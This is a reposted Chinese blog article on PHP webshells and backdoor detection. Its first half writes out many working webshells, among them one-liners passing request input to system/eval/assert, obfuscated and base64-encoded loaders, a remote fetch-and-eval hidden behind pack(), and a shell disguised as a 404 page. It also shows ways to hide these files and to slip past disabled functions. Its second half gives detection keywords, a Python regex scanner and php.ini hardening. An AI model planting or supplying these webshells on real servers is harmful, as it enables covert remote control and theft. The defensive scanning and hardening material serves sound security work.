PHP安全之webshell和后门检测

PHP安全之webshell和后门检测

一、各种webshell

一句话木马,其形式如下所示:

if(isset($_REQUEST['cmd'])){

    $cmd = ($_REQUEST["cmd"]);

    system($cmd);

    echo "$cmd

";

    die;

}

?>

这种容易被安全软件检测出来。为了增强隐蔽性,出现了各种一句话木马的变形,通过各种函数来伪装,这里不得不吐槽PHP弱类型对于安全来说是致命的

a、使用str_replace函数

"","axsxxsxexrxxt");$a($_POST["code"]); ?>

 

//说明:请求参数  ?code=fputs(fopen(base64_decode(J2MucGhwJw==),w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg=="))

最终执行命令'c.php',w),""))?>

b、使用str_rot13函数

'code']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($code)''add'); ?>

//说明:首先,将eval函数用str_rot13('riny')隐藏。然后,利用 e 修饰符,在preg_replace完成字符串替换后,使得引擎将结果字符串作为php代码使用eval方式进行评估并将返回值作为最终参与替换的字符串。

c、使用include函数

'code'];include ($filename); ?>

 

//由于include方法可以直接编译任何格式的文件为php格式运行,因此可以上传一个txt格式的php文件,将真正的后门写在文本当中。

d、使用pack函数

if(empty($_SESSION['api']))

    $_SESSION['api']=substr(file_get_contents(sprintf('%s?  %s',pack(“H*”,'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);

    @preg_replace(“~(.*)~ies”,gzuncompress($_SESSION['api']),null);

?>

e、使用session

session_start();

$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);

$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

f、隐藏在html页面

"-//IETF//DTD HTML 2.0//EN">

<head>

404 Not Found<</code><code>/title</code><code>></code></p> <p><code><</code><code>/head</code><code>><body></code></p> <p><code><h1>Not Found<</code><code>/h1</code><code>></code></p> <p><code><p>The requested URL was not found on this server.<</code><code>/p</code><code>></code></p> <p><code><</code><code>/body</code><code>><</code><code>/html</code><code>></code></p> <p><code><?php</code></p> <p><code>@preg_replace(</code><code>"/[pageerror]/e"</code><code>,$_POST[</code><code>'error'</code><code>],</code><code>"saft"</code><code>);</code></p> <p><code>header(</code><code>'HTTP/1.1 404 Not Found'</code><code>);</code></p> <p><code>?></code></p> <p>g、使用assert函数</p> <p><?php assert($_POST[sb]);?></p> <p>或者</p> <p><code><?php</code></p> <p><code>$item[</code><code>'wind'</code><code>] = </code><code>'assert'</code><code>;</code></p> <p><code>$array[] = $item;</code></p> <p><code>$array[0][</code><code>'wind'</code><code>]($_POST[</code><code>'iixosmse'</code><code>]);</code></p> <p>h、使用copy函数复制文件</p> <p><code><?php</code></p> <p><code>$reg=</code><code>"c"</code><code>.</code><code>"o"</code><code>.</code><code>"p"</code><code>.</code><code>"y"</code><code>;</code></p> <p><code>$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);</code></p> <h3>二、代码混淆</h3> <p><code><?php </code></p> <p><code>@$_++; </code><code>//</code> <code>$_ = 1 </code></p> <p><code>$__=(</code><code>"#"</code><code>^</code><code>"|"</code><code>); </code><code>//</code> <code>$__ = _ </code></p> <p><code>$__.=(</code><code>"."</code><code>^</code><code>"~"</code><code>); </code><code>//</code> <code>_P </code></p> <p><code>$__.=(</code><code>"/"</code><code>^</code><code>"`"</code><code>); </code><code>//</code> <code>_PO </code></p> <p><code>$__.=(</code><code>"|"</code><code>^</code><code>"/"</code><code>); </code><code>//</code> <code>_POS </code></p> <p><code>$__.=(</code><code>"{"</code><code>^</code><code>"/"</code><code>); </code><code>//</code> <code>_POST </code></p> <p><code>${$__}[!$_](${$__}[$_]); </code><code>//</code> <code>$_POST[0]($_POST[1]); </code></p> <p><code>?></code></p> <p>或者</p> <p><code><?php </code></p> <p><code>    </code><code>$penh=</code><code>"sIGpvaW4oYXJyYgiXlfc2xpY2UoJGEsgiJGMoJGEpLTgiMpKSkpgiKTtlY2hvICc8LycgiuJgiGsugiJz4nO30="</code><code>; </code></p> <p><code>    </code><code>$kthe=</code><code>"JGEpPjgiMpeyRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn"</code><code>; </code></p> <p><code>    </code><code>$ftdf = str_replace(</code><code>"w"</code><code>,</code><code>""</code><code>,</code><code>"stwrw_wrwepwlwawcwe"</code><code>); </code></p> <p><code>    </code><code>$wmmi=</code><code>"X3JlcgiGxhY2UgioYXgiJyYXkoJy9bXlx3PVgixzXS8nLCgicvXHMvJyksIGFycmF5KCcnLCcrgiJyk"</code><code>; </code></p> <p><code>    </code><code>$zrmt=</code><code>"JGM9J2NvdWgi50JzskgiYT0gikX0NgiPT0tJRgiTtpZihyZXNldCgkYSk9PSgidvbycggiJgiiYgJGMo"</code><code>; </code></p> <p><code>    </code><code>$smgv = $ftdf(</code><code>"f"</code><code>, </code><code>""</code><code>, </code><code>"bfafsfef6f4_fdfefcodfe"</code><code>); </code></p> <p><code>    </code><code>$jgfi = $ftdf(</code><code>"l"</code><code>,</code><code>""</code><code>,</code><code>"lclrlelaltel_functlilon"</code><code>); </code></p> <p><code>    </code><code>$rdwm = $jgfi(</code><code>''</code><code>, $smgv($ftdf(</code><code>"gi"</code><code>, </code><code>""</code><code>, $zrmt.$kthe.$wmmi.$penh))); $rdwm(); </code></p> <p><code>?></code></p> <p>可以使用weevely工具来生成,代码伪装避开各种主流的杀毒软件</p> <blockquote> <p>PHP后门生成工具weevely</p> <p>weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。</p> <p>weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作为检查规则的eval,system等函数都不会直接出现在代码中,从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描,结果显示该文件无任何威胁。</p> </blockquote> <p>更常用的混淆视听的方法:(这种是服务器层面的混淆)</p> <ul> <li> <p>修改文件时间</p> </li> <li> <p>改名融入上传后所在文件夹,让人无法直观看出文件异常</p> </li> <li> <p>文件大小的伪装处理(至少看起大小像个正常脚本)</p> </li> <li> <p>选好藏身路径并尽量少的访问</p> </li> <li> <p>畸形目录%20</p> </li> </ul> <h3>三、如果绕过配置文件</h3> <p>一般的服务器管理员会把 system、exec等危险函数禁用的,那么如何绕过呢?</p> <h3>1、使用反射</h3> <p>相关内容可参考:http://cn2.php.net/manual/en/reflectionfunction.invokeargs.php。</p> <pre><code class="language-html hljs"><?php $func = new ReflectionFunction("system"); echo $func->invokeArgs(array("$_GET[c]")); ?></code></pre> <p> </p> <p>2、使用callback</p> <p>php提供的另外一种可间接调用函数的方法是callback. 这里使用了ob_start.具体说明可参考:http://www.php.net/manual/en/function.ob-start.php</p> <p><code><?php</code></p> <p><code>$cb= </code><code>'system'</code><code>;</code></p> <p><code>ob_start($cb);</code></p> <p><code>echo</code> <code>$_GET[c];</code></p> <p><code>ob_end_flush();</code></p> <p><code>?></code></p> <p>php中支持callback的函数还有很多,比如 array_map,array_filter, array_reduce,usort(),uksort(),array_walk() 等</p> <p> </p> <h3>四、安全人员应该怎么做</h3> <h3>1、如何查找</h3> <p>直观寻找方式也有很多</p> <ul> <li> <p>通过文件名/修改时间/大小,文件备份比对发现异常(SVN/Git对比,查看文件是否被修改)</p> </li> <li> <p>通过WEBSHELL后门扫描脚本发现,如Scanbackdoor.php/Pecker/shelldetect.php/(zhujiweishi )</p> </li> <li> <p>通过access.log访问日志分析</p> </li> </ul> <p>下面是360 zhujiweishi ,在linux服务器上非常简单好用</p> <p>通过常见的关键词如(可以使用find 和 grep 等命令结合起来搜索代码中是否包含以下文件)</p> <ul> <li> <p>系统命令执行: system, passthru, shell_exec, exec, popen, proc_open</p> </li> <li> <p>代码执行: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13</p> </li> <li> <p>文件包含: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite</p> </li> </ul> <p>通过简单的python脚本</p> <p><code>#!/usr/bin/env python</code></p> <p><code># encoding: utf-8</code></p> <p><code> </code> </p> <p><code>import</code> <code>os,sys</code></p> <p><code>import</code> <code>re</code></p> <p><code>import</code> <code>hashlib</code></p> <p><code>import</code> <code>time</code></p> <p><code> </code> </p> <p><code>rulelist </code><code>=</code> <code>[</code></p> <p><code>    </code><code>'(\$_(GET|POST|REQUEST)\[.{0,15}\]\s{0,10}\(\s{0,10}\$_(GET|POST|REQUEST)\[.{0,15}\]\))'</code><code>,</code></p> <p><code>    </code><code>'((eval|assert)(\s|\n)*\((\s|\n)*\$_(POST|GET|REQUEST)\[.{0,15}\]\))'</code><code>,</code></p> <p><code>    </code><code>'(eval(\s|\n)*\(base64_decode(\s|\n)*\((.|\n){1,200})'</code><code>,</code></p> <p><code>    </code><code>'(function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|passthru)+[\'|\"]\s*\))'</code><code>,</code></p> <p><code>    </code><code>'((exec|shell\_exec|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*\))'</code><code>,</code></p> <p><code>    </code><code>'(\$(\w+)\s*\(\s.chr\(\d+\)\))'</code><code>,</code></p> <p><code>    </code><code>'(\$(\w+)\s*\$\{(.*)\})'</code><code>,</code></p> <p><code>    </code><code>'(\$(\w+)\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\s*\))'</code><code>,</code></p> <p><code>    </code><code>'(\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\(\s*\$(.*)\))'</code><code>,</code></p> <p><code>    </code><code>'(\$\_\=(.*)\$\_)'</code><code>,</code></p> <p><code>    </code><code>'(\$(.*)\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\))'</code><code>,</code></p> <p><code>    </code><code>'(new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\))'</code><code>,</code></p> <p><code>    </code><code>'(echo\s*curl\_exec\s*\(\s*\$(\w+)\s*\))'</code><code>,</code></p> <p><code>    </code><code>'((fopen|fwrite|fputs|file\_put\_contents)+\s*\((.*)\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\](.*)\))'</code><code>,</code></p> <p><code>    </code><code>'(\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_(GET|POST|REQUEST|FILES)+\[(.*)\]\[(.*)\]\s*\))'</code><code>,</code></p> <p><code>    </code><code>'(\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*\$(\w+)\s*\))'</code><code>,</code></p> <p><code>    </code><code>'((include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+)\.(jpg|gif|ico|bmp|png|txt|zip|rar|htm|css|js)+[\'|\"]\s*\))'</code><code>,</code></p> <p><code>    </code><code>'(eval\s*\(\s*\(\s*\$\$(\w+))'</code><code>,</code></p> <p><code>    </code><code>'((eval|assert|include|require|include\_once|require\_once|array\_map|array\_walk)+\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\))'</code><code>,</code></p> <p><code>    </code><code>'(preg\_replace\s*\((.*)\(base64\_decode\(\$)'</code></p> <p><code>    </code><code>]</code></p> <p><code> </code> </p> <p><code>def</code> <code>scan(path):</code></p> <p><code>    </code><code>print</code><code>(</code><code>'           可疑文件         '</code><code>)</code></p> <p><code>    </code><code>print</code><code>(</code><code>'*'</code><code>*</code><code>30</code><code>)</code></p> <p><code>    </code><code>for</code> <code>root,dirs,files </code><code>in</code> <code>os.walk(path):</code></p> <p><code>        </code><code>for</code> <code>filespath </code><code>in</code> <code>files:</code></p> <p><code>            </code><code>if</code> <code>os.path.getsize(os.path.join(root,filespath))<</code><code>1024000</code><code>:</code></p> <p><code>                </code><code>file</code><code>=</code> <code>open</code><code>(os.path.join(root,filespath))</code></p> <p><code>                </code><code>filestr </code><code>=</code> <code>file</code><code>.read()</code></p> <p><code>                </code><code>file</code><code>.close()</code></p> <p><code>                </code><code>for</code> <code>rule </code><code>in</code> <code>rulelist:</code></p> <p><code>                    </code><code>result </code><code>=</code> <code>re.</code><code>compile</code><code>(rule).findall(filestr)</code></p> <p><code>                    </code><code>if</code> <code>result:</code></p> <p><code>                        </code><code>print</code> <code>'文件:'</code><code>+</code><code>os.path.join(root,filespath )</code></p> <p><code>                        </code><code>print</code> <code>'恶意代码:'</code><code>+</code><code>str</code><code>(result[</code><code>0</code><code>][</code><code>0</code><code>:</code><code>200</code><code>])</code></p> <p><code>                        </code><code>print</code> <code>(</code><code>'最后修改时间:'</code><code>+</code><code>time.strftime(</code><code>'%Y-%m-%d %H:%M:%S'</code><code>,time.localtime(os.path.getmtime(os.path.join(root,filespath)))))</code></p> <p><code>                        </code><code>print</code> <code>'\n\n'</code></p> <p><code>                        </code><code>break</code></p> <p><code>def</code> <code>md5sum(md5_file):</code></p> <p><code>    </code><code>m </code><code>=</code> <code>hashlib.md5()</code></p> <p><code>    </code><code>fp </code><code>=</code> <code>open</code><code>(md5_file)</code></p> <p><code>    </code><code>m.update(fp.read())</code></p> <p><code>    </code><code>return</code> <code>m.hexdigest()</code></p> <p><code>    </code><code>fp.close()</code></p> <p><code> </code> </p> <p><code>if</code> <code>md5sum(</code><code>'/etc/issue'</code><code>) </code><code>=</code><code>=</code> <code>'3e3c7c4194b12af573ab11c16990c477'</code><code>:</code></p> <p><code>    </code><code>if</code> <code>md5sum(</code><code>'/usr/sbin/sshd'</code><code>) </code><code>=</code><code>=</code> <code>'abf7a90c36705ef679298a44af80b10b'</code><code>:</code></p> <p><code>        </code><code>pass</code></p> <p><code>    </code><code>else</code><code>:</code></p> <p><code>        </code><code>print</code><code>(</code><code>'*'</code><code>*</code><code>40</code><code>)</code></p> <p><code>        </code><code>print</code> <code>"\033[31m sshd被修改,疑似留有后门\033[m"</code></p> <p><code>        </code><code>print</code><code>(</code><code>'*'</code><code>*</code><code>40</code><code>)</code></p> <p><code>        </code><code>time.sleep(</code><code>5</code><code>)</code></p> <p><code>if</code> <code>md5sum(</code><code>'/etc/issue'</code><code>) </code><code>=</code><code>=</code> <code>'6c9222ee501323045d85545853ebea55'</code><code>:</code></p> <p><code>    </code><code>if</code> <code>md5sum(</code><code>'/usr/sbin/sshd'</code><code>) </code><code>=</code><code>=</code> <code>'4bbf2b12d6b7f234fa01b23dc9822838'</code><code>:</code></p> <p><code>        </code><code>pass</code></p> <p><code>    </code><code>else</code><code>:</code></p> <p><code>        </code><code>print</code><code>(</code><code>'*'</code><code>*</code><code>40</code><code>)</code></p> <p><code>        </code><code>print</code> <code>"\033[31m sshd被修改,疑似留有后门\033[m"</code></p> <p><code>        </code><code>print</code><code>(</code><code>'*'</code><code>*</code><code>40</code><code>)</code></p> <p><code>        </code><code>time.sleep(</code><code>5</code><code>)</code></p> <p><code>if</code> <code>__name__</code><code>=</code><code>=</code><code>'__main__'</code><code>:</code></p> <p><code> </code> </p> <p><code>    </code><code>if</code> <code>len</code><code>(sys.argv)!</code><code>=</code><code>2</code><code>:</code></p> <p><code>        </code><code>print</code> <code>'参数错误'</code></p> <p><code>        </code><code>print</code> <code>"\t按恶意代码查找:"</code><code>+</code><code>sys.argv[</code><code>0</code><code>]</code><code>+</code><code>'目录名'</code></p> <p><code>    </code><code>if</code> <code>os.path.lexists(sys.argv[</code><code>1</code><code>]) </code><code>=</code><code>=</code> <code>False</code><code>:</code></p> <p><code>        </code><code>print</code> <code>"目录不存在"</code></p> <p><code>        </code><code>exit()</code></p> <p><code>    </code><code>print</code> <code>(</code><code>'\n\n开始查找:'</code><code>+</code><code>sys.argv[</code><code>1</code><code>])</code></p> <p><code>    </code><code>if</code> <code>len</code><code>(sys.argv) </code><code>=</code><code>=</code><code>2</code><code>:</code></p> <p><code>        </code><code>scan(sys.argv[</code><code>1</code><code>])</code></p> <p><code>    </code><code>else</code><code>:</code></p> <p><code>        </code><code>exit()</code></p> <p>2、如何防范</p> <p>php.ini 设置</p> <ul> <li> <p>disable_functions =phpinfo,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,get_current_user,leak,putenv,popen,opendir</p> </li> <li> <p>设置“safe_mode”为“on”</p> </li> <li> <p>禁止“open_basedir” 可以禁止指定目录之外的文件操作</p> </li> <li> <p>expose_php设为off 这样php不会在http文件头中泄露信息</p> </li> <li> <p>设置“allow_url_fopen”为“off” 可禁止远程文件功能</p> </li> <li> <p>log_errors”设为“on” 错误日志开启</p> </li> </ul> <p>php编码方面</p> <ul> <li> <p>所有用户提交的信息  post get 或是其他形式提交的数据 都要单独写个过滤函数处理一遍,养成习惯(intval,strip_tags,mysql_real_escape_string)</p> </li> <li> <p>经常检查有没有一句话木马 eval($_POST[ 全站搜索php代码有没有这样的源代码</p> </li> <li> <p>文件要命名规范 至少让自己可以一目了然,哪些php文件名字有问题</p> </li> <li> <p>如用开源代码,有补丁出来的话,尽快打上补丁</p> </li> <li> <p>如果攻击者拿到了服务器的最高权限,有可能通过修改服务器的配置文件php.ini来达到他们隐藏后门的目的,前几年比较流行。原理如下:php.ini 里面的这两个配置项:auto_prepend_file ,auto_append_file 可以让php解析前,自己加点东西进去 Automatically add files before or after any PHP document,如果被配置了eval()函数的后门 那就很阴险了,php文件代码里面查不出,只会在php解析前包含eval()函数进来 并且因为是全局的 所以所有php页面都是后门!所以要先确认auto_prepend_file ,auto_append_file没被配置成其他东西,才进行第3点的源代码检查。</p> </li> </ul> <p>服务器配置</p> <p>配置的时候尽量使用最小权限,不要写入或者执行的目录不能给相应的权限</p> <p>nginx或者apache配置的时候,不能访问的目录一定要配置为deny</p> <p> </p> <p> </p> <p> </p> <p>文章出处;https://www.cnblogs.com/chenpingzhao/p/6562415.html</p> <p>参考文章</p> <p>https://github.com/chenpingzhao/php-webshells</p> <p>http://blog.csdn.net/miltonzhong/article/details/9714367</p> <p>http://blog.jobbole.com/53821/</p> <p>posted @ 2019-05-06 22:01 卿先生 阅读(...) 评论(...) 编辑 收藏</p> </div> </div> </div> </div> </div> <!--PC和WAP自适应版--> <div id="SOHUCS" sid="1188359937802215424"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script> <!-- 文章页-底部 动态广告位 --> <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad"> <!-- 文章页-右侧1 动态广告位 --> <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div> <!-- 文章页-右侧2 动态广告位 --> <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_2"></div> </div> <!-- 文章页-右侧3 动态广告位 --> <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(代码审计,Web渗透,木马免杀)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1903757352520183808.htm" title="html5 相册翻转效果,HTML5 css3:3D旋转木马效果相册" target="_blank">html5 相册翻转效果,HTML5 css3:3D旋转木马效果相册</a> <span class="text-muted">岑依惜</span> <a class="tag" taget="_blank" href="/search/html5/1.htm">html5</a><a class="tag" taget="_blank" href="/search/%E7%9B%B8%E5%86%8C%E7%BF%BB%E8%BD%AC%E6%95%88%E6%9E%9C/1.htm">相册翻转效果</a> <div>这篇博客的目的是因为上篇HTML5CSS3专题诱人的实例CSS3打造百度贴吧的3D翻牌效果中有个关于CSS3D效果的比较重要的知识点没讲到,就是perspective和tranlateY效果图:嘿嘿,我把大学毕业时的一些照片,做成旋转木马,绕着我大文理旋转,不忘母校的培育之恩~1、perspectiveperspective属性包括两个属性:none和具有单位的长度值。其中perspective属</div> </li> <li><a href="/article/1903752297968627712.htm" title="【Html+CSS】3D旋转相册" target="_blank">【Html+CSS】3D旋转相册</a> <span class="text-muted">小木荣</span> <a class="tag" taget="_blank" href="/search/web%E5%89%8D%E7%AB%AF/1.htm">web前端</a><a class="tag" taget="_blank" href="/search/css/1.htm">css</a><a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/3d/1.htm">3d</a> <div>3D旋转木马相册&3D盒子相册因为代码大部分相同,就放一起了注释一下就是另一个相册3D旋转木马相册body{background-color:#000;/*视距,使子元素获得视距效果*/perspective:900px;}section{margin:20vhauto;position:relative;width:200px;height:200px;/*开启3D空间*/transform-s</div> </li> <li><a href="/article/1902157089279635456.htm" title="网站老是被上传木马后门,怎么办?推荐两步解决法" target="_blank">网站老是被上传木马后门,怎么办?推荐两步解决法</a> <span class="text-muted">hwscom</span> <a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%AE%89%E5%85%A8%E6%8A%80%E6%9C%AF/1.htm">服务器安全技术</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a> <div>站长朋友们,基本上都遭遇过网页木马和网站后门吧!其中最出名的当属“一句话木马”,因为非常简短,真的只有一句话(如下图),并且一般都嵌入到网站正常代码内,让人难以察觉。(图一:一句话木马)黑客入侵服务器往往都会先入侵网站,植入木马后门,再通过该木马后门进一步窃取服务器权限。黑客植入木马后门主要有以下几种途径:在线上传漏洞、FTP信息泄露、跨站入侵。其中在线上传漏洞是最常用的途径,占比高达90%以上。</div> </li> <li><a href="/article/1901544560849383424.htm" title="深度探索 Java 代码审计:筑牢安全防线的关键之路" target="_blank">深度探索 Java 代码审计:筑牢安全防线的关键之路</a> <span class="text-muted">阿贾克斯的黎明</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>在当今高度数字化的时代,软件安全成为了至关重要的议题。对于众多使用Java语言进行开发的程序员而言,深入掌握Java代码审计技能,无疑是守护软件安全的核心手段。本文将围绕一本涵盖Java代码审计丰富知识的书籍目录,全面剖析Java代码审计的各个关键环节以及其在CTFAWD比赛中的重要应用。一、学习经验:开启Java代码审计的智慧之门Java代码审计之路并非坦途,需要有系统的学习方法和实践经验。书籍</div> </li> <li><a href="/article/1901540906268422144.htm" title="网络通信安全:全面探索与深入分析" target="_blank">网络通信安全:全面探索与深入分析</a> <span class="text-muted">baimao__沧海</span> <a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/sqlserver/1.htm">sqlserver</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/android/1.htm">android</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a> <div>**摘要:**本文全面探索网络通信安全相关内容。首先阐述网络通信安全的基本概念与原理,包括网络通信模型、安全目标以及加密技术基础。接着详细分析其面临的威胁,涵盖恶意软件(病毒、蠕虫、特洛伊木马)、网络攻击(DoS/DDoS、网络嗅探、SQL注入)和社会工程学攻击等。然后介绍防护机制,如防火墙、IDS与IPS、VPN、数据加密技术应用、身份认证与访问控制等。还论述了网络通信安全在企业、金融、政府领域</div> </li> <li><a href="/article/1901135147974062080.htm" title="黑客攻防从入门到精通(第一篇:认识黑客)" target="_blank">黑客攻防从入门到精通(第一篇:认识黑客)</a> <span class="text-muted">晓生夜梦</span> <a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/%E9%BB%91%E5%AE%A2%E6%94%BB%E9%98%B2%E4%B9%A6%E7%B1%8D%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/1.htm">黑客攻防书籍学习笔记</a><a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a> <div>1.黑客:白帽,灰帽,黑帽(骇客)2.黑客术语:肉鸡(可以随意被黑客控制的计算机),木马(伪装成正常程序),网页木马(有人访问时,利用对方系统或者浏览器的漏洞自动将配置好木马的服务下载到访问者的计算机上自动执行),挂马,后门(重新控制计算机)IPC$,shell,webshell,溢出,注入,注入点免杀(用一些技术修改程序,让它逃过杀毒软件查杀),加壳花指令(让汇编语言进行一些跳转——就比如杀毒软</div> </li> <li><a href="/article/1901131366205026304.htm" title="《黑客攻防从入门到精通:工具篇》全15章万字深度总结——从工具解析到实战攻防,构建完整网络安全知识体系" target="_blank">《黑客攻防从入门到精通:工具篇》全15章万字深度总结——从工具解析到实战攻防,构建完整网络安全知识体系</a> <span class="text-muted">予安灵</span> <a class="tag" taget="_blank" href="/search/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/1.htm">黑客技术</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8/1.htm">系统安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%9E%B6%E6%9E%84/1.htm">安全架构</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9E%8B/1.htm">网络攻击模型</a><a class="tag" taget="_blank" href="/search/%E9%BB%91%E5%AE%A2%E5%B7%A5%E5%85%B7%E9%93%BE/1.htm">黑客工具链</a> <div>目录一、书籍核心逻辑与学习路径二、核心模块与工具深度解析模块1:信息收集与网络扫描模块2:渗透测试与漏洞利用模块3:密码攻防与身份认证模块4:恶意程序攻防模块5:网络追踪与反追踪模块6:系统加固与数据防护三、工具链实战方法论第一章:黑客必备小工具第二章:扫描与嗅探工具第三章:注入工具(诸如工具)第四章:密码攻防工具第五章:病毒攻防常用工具第六章:木马攻防常用工具第七章:网游与网吧攻防工具第八章:黑</div> </li> <li><a href="/article/1900491226591850496.htm" title="web渗透--14--目录遍历/文件包含测试" target="_blank">web渗透--14--目录遍历/文件包含测试</a> <span class="text-muted">武天旭</span> <a class="tag" taget="_blank" href="/search/web%E6%B8%97%E9%80%8F/1.htm">web渗透</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a><a class="tag" taget="_blank" href="/search/OWASP%E5%AE%89%E5%85%A8%E6%B5%8B%E8%AF%95/1.htm">OWASP安全测试</a> <div>1、漏洞描述文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果。主要包括本地文件包含和远程文件包含两种形式,由于开发人员编写源码,开放着将可重复使用的代码插入到单个的文件中,并在需要的时候将它们包含在特殊的功能代码文件中,然后包含文件中的代码</div> </li> <li><a href="/article/1900149823420559360.htm" title="网站安全科普:守护你的数字家园" target="_blank">网站安全科普:守护你的数字家园</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a> <div>在互联网时代,网站已成为我们生活和工作的重要组成部分。然而,网站安全问题也日益突出,数据泄露、网络攻击等事件频发,给个人和企业带来巨大损失。本文将为您科普网站安全知识,帮助您守护数字家园。一、网站安全威胁无处不在数据泄露:网站数据库被黑客攻破,用户个人信息、财务数据等敏感信息被窃取。恶意软件:网站被植入恶意代码,用户访问时会被感染病毒、木马等,导致设备损坏或信息泄露。网络钓鱼:假冒正规网站,诱导用</div> </li> <li><a href="/article/1899780625984974848.htm" title="熊猫烧香之手动查杀" target="_blank">熊猫烧香之手动查杀</a> <span class="text-muted">梦断九歌</span> <a class="tag" taget="_blank" href="/search/%E5%91%BD%E4%BB%A4/1.htm">命令</a><a class="tag" taget="_blank" href="/search/%E5%B7%A5%E5%85%B7/1.htm">工具</a><a class="tag" taget="_blank" href="/search/%E9%9A%90%E8%97%8F/1.htm">隐藏</a><a class="tag" taget="_blank" href="/search/%E8%BD%AF%E4%BB%B6/1.htm">软件</a><a class="tag" taget="_blank" href="/search/%E5%88%A0%E9%99%A4/1.htm">删除</a> 